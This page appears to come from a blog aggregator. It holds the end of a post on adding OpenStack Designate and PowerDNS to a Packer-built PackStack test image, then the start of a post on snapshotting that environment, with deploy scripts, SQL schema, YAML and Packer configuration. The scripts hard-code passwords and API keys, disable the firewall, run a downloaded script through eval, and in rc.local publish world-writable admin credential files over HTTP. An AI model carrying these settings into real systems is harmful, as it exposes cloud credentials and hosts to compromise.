+ setuid=pdns
+ slave=yes
+ socket-dir=/var/run
+ version-string=powerdns
+ out-of-zone-additional-processing=no
+ webserver=yes
+ api=yes
+ api-key=someapikey
+ launch=gmysql
+ gmysql-host=127.0.0.1
+ gmysql-user=pdns
+ gmysql-dbname=pdns
+ gmysql-password=password" | tee /etc/pdns/pdns.conf
+
+ mysql pdns < /home/centos/files/pdns.sql
+ sudo systemctl restart pdns

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are four things being done above:

  1. A MySQL database is created for PowerDNS.
  2. PowerDNS is then installed.
  3. A configuration file is created.
  4. A database schema is imported into the PowerDNS database.

You'll notice the schema is located in a file titled files/pdns.sql. Add the following to terraform-openstack-test/packer/files/pdns.sql:

CREATE TABLE domains (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255) NOT NULL,
  master                VARCHAR(128) DEFAULT NULL,
  last_check            INT DEFAULT NULL,
  type                  VARCHAR(6) NOT NULL,
  notified_serial       INT DEFAULT NULL,
  account               VARCHAR(40) DEFAULT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX name_index ON domains(name);


CREATE TABLE records (
  id                    BIGINT AUTO_INCREMENT,
  domain_id             INT DEFAULT NULL,
  name                  VARCHAR(255) DEFAULT NULL,
  type                  VARCHAR(10) DEFAULT NULL,
  content               VARCHAR(64000) DEFAULT NULL,
  ttl                   INT DEFAULT NULL,
  prio                  INT DEFAULT NULL,
  change_date           INT DEFAULT NULL,
  disabled              TINYINT(1) DEFAULT 0,
  ordername             VARCHAR(255) BINARY DEFAULT NULL,
  auth                  TINYINT(1) DEFAULT 1,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX nametype_index ON records(name,type);
CREATE INDEX domain_id ON records(domain_id);
CREATE INDEX recordorder ON records (domain_id, ordername);


CREATE TABLE supermasters (
  ip                    VARCHAR(64) NOT NULL,
  nameserver            VARCHAR(255) NOT NULL,
  account               VARCHAR(40) NOT NULL,
  PRIMARY KEY (ip, nameserver)
) Engine=InnoDB;


CREATE TABLE comments (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  name                  VARCHAR(255) NOT NULL,
  type                  VARCHAR(10) NOT NULL,
  modified_at           INT NOT NULL,
  account               VARCHAR(40) NOT NULL,
  comment               VARCHAR(64000) NOT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX comments_domain_id_idx ON comments (domain_id);
CREATE INDEX comments_name_type_idx ON comments (name, type);
CREATE INDEX comments_order_idx ON comments (domain_id, modified_at);


CREATE TABLE domainmetadata (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  kind                  VARCHAR(32),
  content               TEXT,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX domainmetadata_idx ON domainmetadata (domain_id, kind);


CREATE TABLE cryptokeys (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  flags                 INT NOT NULL,
  active                BOOL,
  content               TEXT,
  PRIMARY KEY(id)
) Engine=InnoDB;

CREATE INDEX domainidindex ON cryptokeys(domain_id);


CREATE TABLE tsigkeys (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255),
  algorithm             VARCHAR(50),
  secret                VARCHAR(255),
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX namealgoindex ON tsigkeys(name, algorithm);
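
Before moving on to Designate, it can be worth a quick sanity check that PowerDNS and its HTTP API respond. The configuration above enables the API with api-key=someapikey and leaves the webserver on its default port (8081 unless webserver-port says otherwise), so something like this should return an empty JSON list of zones:

  # Query the PowerDNS HTTP API on the instance itself
  curl -s -H 'X-API-Key: someapikey' http://127.0.0.1:8081/api/v1/servers/localhost/zones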

Installing Designate

Now that deploy.sh will install and configure PowerDNS, add the steps to install and configure Designate:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
  mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"

  yum install -y epel-release yum-plugin-priorities
  curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
  yum install -y pdns pdns-backend-mysql

  echo "daemon=no
  allow-recursion=127.0.0.1
  config-dir=/etc/powerdns
  daemon=yes
  disable-axfr=no
  guardian=yes
  local-address=0.0.0.0
  local-ipv6=::
  local-port=53
  setgid=pdns
  setuid=pdns
  slave=yes
  socket-dir=/var/run
  version-string=powerdns
  out-of-zone-additional-processing=no
  webserver=yes
  api=yes
  api-key=someapikey
  launch=gmysql
  gmysql-host=127.0.0.1
  gmysql-user=pdns
  gmysql-dbname=pdns
  gmysql-password=password" | tee /etc/pdns/pdns.conf

  mysql pdns < /home/centos/files/pdns.sql
  sudo systemctl restart pdns

+ openstack user create --domain default --password password designate
+ openstack role add --project services --user designate admin
+ openstack service create --name designate --description "DNS" dns
+ openstack endpoint create --region RegionOne dns public http://127.0.0.1:9001/
+
+ mysql -e "CREATE DATABASE designate CHARACTER SET utf8 COLLATE utf8_general_ci"
+ mysql -e "CREATE DATABASE designate_pool_manager"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate_pool_manager.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y crudini
+
+ yum install -y openstack-designate\*
+
+ cp /home/centos/files/pools.yaml /etc/designate/
+
+ designate_conf="/etc/designate/designate.conf"
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT notification_driver messaging
+ crudini --set $designate_conf service:api enabled_extensions_v2 "quotas, reports"
+ crudini --set $designate_conf keystone_authtoken auth_uri http://127.0.0.1:5000
+ crudini --set $designate_conf keystone_authtoken auth_url http://127.0.0.1:35357
+ crudini --set $designate_conf keystone_authtoken username designate
+ crudini --set $designate_conf keystone_authtoken password password
+ crudini --set $designate_conf keystone_authtoken project_name services
+ crudini --set $designate_conf keystone_authtoken auth_type password
+ crudini --set $designate_conf service:worker enabled true
+ crudini --set $designate_conf service:worker notify true
+ crudini --set $designate_conf storage:sqlalchemy connection mysql+pymysql://designate:password@127.0.0.1/designate
+
+ sudo -u designate designate-manage database sync
+
+ systemctl enable designate-central designate-api
+ systemctl enable designate-worker designate-producer designate-mdns
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+
+ sudo -u designate designate-manage pool update

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service
+ systemctl stop designate-central designate-api
+ systemctl stop designate-worker designate-producer designate-mdns

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are several steps happening above:

  1. The openstack command is used to create a new service account called designate. A catalog endpoint is also created.
  2. A database called designate is created.
  3. A utility called crudini is installed. This is an amazing little tool for modifying ini files on the command-line (see the short example after this list).
  4. Designate is installed.
  5. A bundled pools.yaml file is copied to /etc/designate. I'll show the contents of this file soon.
  6. crudini is used to configure /etc/designate/designate.conf.
  7. The Designate database's schema is imported using the designate-manage command.
  8. The Designate services are enabled in systemd.
  9. designate-manage is again used, this time to update the DNS pools.
  10. The Designate services are added to the list of services to stop before the image/snapshot is created.

These steps roughly follow the Designate Installation Guide linked to earlier.
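
If you haven't used crudini before, here is a quick illustration of the set/get pattern used in the script above; the file name and values are just hypothetical:

$ crudini --set example.conf DEFAULT debug True    # add or update 'debug' in the [DEFAULT] section
$ crudini --get example.conf DEFAULT debug         # prints: True
$ crudini --del example.conf DEFAULT debug         # remove the option again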

As mentioned, a pools.yaml file is copied from the files directory. Create a file called terraform-openstack-test/packer/files/pools.yaml with the following contents:

---

- name: default
  description: Default PowerDNS Pool
  attributes: {}
  ns_records:
    - hostname: ns.example.com.
      priority: 1

  nameservers:
    - host: 127.0.0.1
      port: 53

  targets:
    - type: pdns4
      description: PowerDNS4 DNS Server
      masters:
        - host: 127.0.0.1
          port: 5354

      # PowerDNS Configuration options
      options:
        host: 127.0.0.1
        port: 53
        api_endpoint: http://127.0.0.1:8081
        api_token: someapikey

Finally, modify the rc.local file:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

  public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
  if [[ -n $public_ip ]]; then
    while true ; do
      mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
      if [[ $? == 0 ]]; then
        break
      fi
      sleep 10
    done

    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
  fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

  systemctl restart openstack-cinder-api.service
  systemctl restart openstack-cinder-backup.service
  systemctl restart openstack-cinder-scheduler.service
  systemctl restart openstack-cinder-volume.service
  systemctl restart openstack-nova-cert.service
  systemctl restart openstack-nova-compute.service
  systemctl restart openstack-nova-conductor.service
  systemctl restart openstack-nova-consoleauth.service
  systemctl restart openstack-nova-novncproxy.service
  systemctl restart openstack-nova-scheduler.service
  systemctl restart neutron-dhcp-agent.service
  systemctl restart neutron-l3-agent.service
  systemctl restart neutron-lbaasv2-agent.service
  systemctl restart neutron-metadata-agent.service
  systemctl restart neutron-openvswitch-agent.service
  systemctl restart neutron-metering-agent.service
  systemctl restart httpd
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+ systemctl restart pdns

  nova-manage cell_v2 discover_hosts

+ sudo -u designate designate-manage pool update
+
+ iptables -I INPUT -p tcp --dport 9001 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 9001 -j ACCEPT
+
  iptables -I INPUT -p tcp --dport 80 -j ACCEPT
  ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
  cp /root/keystonerc* /var/www/html
  chmod 666 /var/www/html/keystonerc*

The following steps have been added to rc.local:

  1. The Designate services have been added to the list of services to be restarted during boot.
  2. PowerDNS is also restarted.
  3. designate-manage is again used to update the DNS pools.
  4. Port 9001, the Designate API port, is opened for traffic.

Build the Image and Launch

With the above in place, you can regenerate your image using Packer and then launch a virtual machine using Terraform.
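
For example, the same Packer and Terraform commands used earlier in this series still apply; the variable values are specific to your cloud:

$ cd packer/openstack
$ packer build \
    -var 'flavor=<flavor name>' \
    -var 'secgroup=<security group>' \
    -var 'image_id=<centos 7 image uuid>' \
    -var 'pool=<pool name>' \
    -var 'network_id=<network uuid>' \
    build.json

$ terraform apply \
    -var "key_name=<keypair name>" \
    -var "network_id=<network uuid>" \
    -var "pool=<pool name>" \
    -var "flavor=<flavor name>"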

When the virtual machine is up and running, you'll find that your testing environment is now running OpenStack Designate.
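
As a quick smoke test, and assuming you have python-designateclient installed on your workstation (it provides the openstack zone commands) and have sourced one of the downloaded keystonerc files, you should be able to create and list a zone; the domain name here is just an example:

$ openstack zone create --email admin@example.com example.com.
$ openstack zone list
$ dig @<public ip of the virtual machine> example.com. SOA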

Conclusion

This blog post covered how to add a service to your OpenStack testing environment that is not supported by PackStack. This was done by reviewing the steps to manually install and configure the service, translating those steps to automated commands, and adding those commands to the existing deployment scripts.

October 09, 2017 06:00 AM

October 07, 2017

Joe Topjian

Building OpenStack Environments Part 2

Introduction

In the last post, I detailed how to create an all-in-one OpenStack environment in an isolated virtual machine for the purpose of testing OpenStack-based applications.

In this post, I'll cover how to create an image from the environment. This will allow you to launch virtual machines which already have the OpenStack environment installed and running. The benefit of this approach is that it reduces the time required to build the environment and pins the environment to a known working version.

In addition, I'll cover how to modify the all-in-one environment so that it can be accessed remotely. This way, testing does not have to be done locally on the virtual machine.

Note: I realize the title of this series might be a misnomer. This series is not covering how to deploy OpenStack in general, but how to set up disposable OpenStack environments for testing purposes. Blame line wrapping.

How to Generate the Image

AWS and OpenStack (and any other cloud provider) provide the ability to create an image (whether AMI, qcow, etc) from a running virtual machine. This is commonly known as "snapshotting".
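
For reference, this is the same operation you could perform by hand against a running server; on an OpenStack cloud it looks roughly like this (the server and image names are hypothetical):

$ openstack server image create --name my-snapshot my-test-server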

The process described here will use snapshotting, but it's not that simple. OpenStack has a lot of moving pieces and some of those pieces are dependent on unique configurations of the host: the hostname, the IP address(es), etc. These items must be accounted for and configured correctly on the new virtual machine.

With this in mind, the process of generating an image is roughly:

  1. Launch a virtual machine.
  2. Install an all-in-one OpenStack environment.
  3. Remove any unique information from the OpenStack databases.
  4. Snapshot.
  5. Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

Creating a Reusable OpenStack Image

Just like in Part 1, it's best to ensure this entire process is automated. Terraform works great for provisioning and deploying infrastructure, but it is not well suited to a niche task such as snapshotting.

Fortunately, there's Packer. And even more fortunate is that Packer supports a wide array of cloud services.

If you haven't used Packer before, I recommend going through the intro before proceeding here.

In Part 1, I used AWS as the cloud being deployed to. For this part, I'll switch things up and use an OpenStack cloud.

Creating a Simple Image

To begin, you can continue using the same terraform-openstack-test directory that was used in Part 1.

First, create a new directory called packer/openstack:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir -p packer/openstack
$ cd packer/openstack

Next, create a file called build.json with the following contents:


{
  "builders": [{
    "type": "openstack",
    "image_name": "packstack-ocata",
    "reuse_ips": true,
    "ssh_username": "centos",

    "flavor": "{{user `flavor`}}",
    "security_groups": ["{{user `secgroup`}}"],
    "source_image": "{{user `image_id`}}",
    "floating_ip_pool": "{{user `pool`}}",
    "networks": ["{{user `network_id`}}"]
  }]
}

I've broken the above into two sections: the top section has hard-coded values while the bottom section requires input on the command-line. This is because the values will vary between your OpenStack cloud and my OpenStack cloud.

With the above in place, run:

$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Note the following: the image_id must be a CentOS 7 image and the Security Group must allow traffic from your workstation to Port 22.

This command will take some time to complete. When it has finished, it will print the UUID of a newly generated image:

==> Builds finished. The artifacts of successful builds are:
--> openstack: An image was created: 53ecc829-60c0-4a87-81f4-9fc603ff2a8f

That UUID will point to an image titled "packstack-ocata".

Congratulations! You just created an image.

However, there is virtually nothing different between "packstack-ocata" and the CentOS image used to create it. All Packer did was launch a virtual machine and create a snapshot of it.

In order for Packer to make changes to the virtual machine, you must configure "provisioners" in the build.json file. Provisioners are just like Terraform's concept of provisioners: steps that will execute commands on the running virtual machine. Before you can add some provisioners to the Packer build file, you first need to generate the scripts which will be run.

Generating an Answer File

In Part 1, PackStack was used to install an all-in-one OpenStack environment. The command used was:

$ packstack --allinone

This very simple command will use a lot of sane defaults and the result will be a fully functional all-in-one environment.

However, in order to more easily make the OpenStack environment run correctly each time a virtual machine is created, the installation needs to be tuned. To do this, a custom "answer file" will be used when running PackStack.

An answer file is a file which contains each configurable setting within PackStack. This file is very large with lots of options. It's not something you want to write from scratch. Instead, PackStack can generate an answer file to be used as a template.

On a CentOS 7 virtual machine, which can even be the same virtual machine you created in Part 1, run:

$ packstack --gen-answer-file=packstack-answers.txt

Copy the file to your workstation using scp or some other means. Make a directory called files to store this answer file:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir packer/files
$ scp -i key/id_rsa centos@<ip>:packstack-answers.txt packer/files

Once stored locally, make the following changes:

First, locate the setting CONFIG_CONTROLLER_HOST. This setting will have the value of an IP address local to the virtual machine which generated this file:

CONFIG_CONTROLLER_HOST=10.41.8.200

Do a global search and replace of 10.41.8.200 with 127.0.0.1.
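
A single sed invocation can do this; for example, assuming GNU sed and the file path used above:

$ sed -i 's/10\.41\.8\.200/127.0.0.1/g' packer/files/packstack-answers.txt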

Next, use this opportunity to tune which services you want to enable for your test environment. For example:

- CONFIG_HORIZON_INSTALL=y
+ CONFIG_HORIZON_INSTALL=n
- CONFIG_CEILOMETER_INSTALL=y
+ CONFIG_CEILOMETER_INSTALL=n
- CONFIG_AODH_INSTALL=y
+ CONFIG_AODH_INSTALL=n
- CONFIG_GNOCCHI_INSTALL=y
+ CONFIG_GNOCCHI_INSTALL=n
- CONFIG_LBAAS_INSTALL=n
+ CONFIG_LBAAS_INSTALL=y
- CONFIG_NEUTRON_FWAAS=n
+ CONFIG_NEUTRON_FWAAS=y

These are all services whose status I have personally changed: either they are disabled by default and I want them enabled, or they are enabled by default and I do not need them. Change the values to suit your needs.

You might notice that there are several embedded passwords and secrets in this answer file. Astute readers will realize that these passwords will all be used for every virtual machine created with this answer file. For production use, this is most definitely not secure. However, I consider this relatively safe since these OpenStack environments are temporary and only for testing.
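
If you do want each image to be built with fresh secrets, one rough sketch is to rewrite the password values in the answer file before running PackStack. This assumes the CONFIG_*_PW naming PackStack uses, and note that every virtual machine created from the resulting image still shares the same secrets:

  # replace every CONFIG_*_PW value in the answer file with a random string
  grep -E '^CONFIG_.*_PW=' packstack-answers.txt | cut -d= -f1 | while read key; do
    sed -i "s/^${key}=.*/${key}=$(openssl rand -hex 16)/" packstack-answers.txt
  done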

Installing OpenStack

Next, begin building a deploy.sh script. You can re-use the deploy.sh script from Part 1 as a start, with one initial change:

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
- packstack --allinone
+ packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

Next, alter packer/openstack/build.json with the following:


  {
    "builders": [{
      "type": "openstack",
      "image_name": "packstack-ocata",
      "reuse_ips": true,
      "ssh_username": "centos",

      "flavor": "{{user `flavor`}}",
      "security_groups": ["{{user `secgroup`}}"],
      "source_image": "{{user `image_id`}}",
      "floating_ip_pool": "{{user `pool`}}",
      "networks": ["{{user `network_id`}}"]
-   }]
+   }],
+   "provisioners": [
+     {
+       "type": "file",
+       "source": "../files",
+       "destination": "/home/centos/files"
+     },
+     {
+       "type": "shell",
+       "inline": [
+         "sudo bash /home/centos/files/deploy.sh"
+       ]
+     }
+   ]
  }

There are two provisioners being created here: one which will copy the files directory to /home/centos/files and one to run the deploy.sh script.

The files directory was created outside of the openstack directory because these files are not unique to OpenStack. You can use the same files to build images in other clouds. For example, create a packer/aws directory and create a similar build.json file for AWS.

With that in place, run… actually, don't run yet. I'll save you a step. While the current configuration will launch an instance, install an all-in-one OpenStack environment, and create a snapshot, OpenStack will not work correctly when you create a virtual machine based on that image.

In order for it to work, there are a few more modifications that need to be made to make sure OpenStack starts correctly on a new virtual machine.

Removing Unique Data

In order to remove the unique data of the OpenStack environment, add the following to deploy.sh:

+ hostnamectl set-hostname localhost
+
  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
